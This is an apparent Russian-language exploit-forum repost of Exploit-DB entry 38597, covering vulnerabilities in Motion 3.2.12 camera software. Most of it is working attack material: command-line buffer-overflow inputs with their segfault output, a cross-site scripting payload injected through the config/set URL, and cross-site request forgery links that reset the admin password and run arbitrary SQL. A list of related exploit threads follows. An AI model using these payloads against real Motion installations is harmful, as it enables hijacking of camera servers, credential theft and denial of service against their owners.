Exploit Motion - Multiple Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
38597
Проверка EDB
  1. Пройдено
Автор
XISTENCE
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2013-06-26
Motion - Multiple Vulnerabilities
Код: 
source: https://www.securityfocus.com/bid/60818/info

Motion is prone to multiple security vulnerabilities including multiple buffer-overflow vulnerabilities, a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.

An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, execute arbitrary code, and cause denial-of-service conditions. Other attacks may also be possible.

Motion 3.2.12 is vulnerable; other versions may also be affected. 

Buffer-overflow:

# motion -c `python -c 'print "\x41"*1000'`
[0] Configfile
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
not fou:
Segmentation fault


# motion -p /tmp/`python -c 'print "\x41"*5000'`
Segmentation fault

Cross-site scripting:

http://www.example.com
<IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li>

Cross-site request forgery:

http://www.example.com/0/config/set?control_authentication=admin:mypassword
(Set admin password)
http://www.example.com/0/config/set?sql_query=SELECT%20user() (Arbitrary 
SQL
query)
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Pixel Motion - '/admin/index.php' Multiple SQL Injections
Ответы
0
Просмотры
357
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit macOS / iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded
Ответы
0
Просмотры
570
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized
Ответы
0
Просмотры
589
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure
Ответы
0
Просмотры
483
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Pixel Motion - 'index.php?date' SQL Injection
Ответы
0
Просмотры
379
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Pixel Motion Blog - 'list_article.php' Cross-Site Scripting
Ответы
0
Просмотры
334
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote Overflow
Ответы
0
Просмотры
312
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin
Ответы
0
Просмотры
301
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Vaidya-Mitra 1.0 - Multiple SQLi
Ответы
0
Просмотры
624
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Thesis Archiving System v1.0 - Multiple-SQLi
Ответы
0
Просмотры
637
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу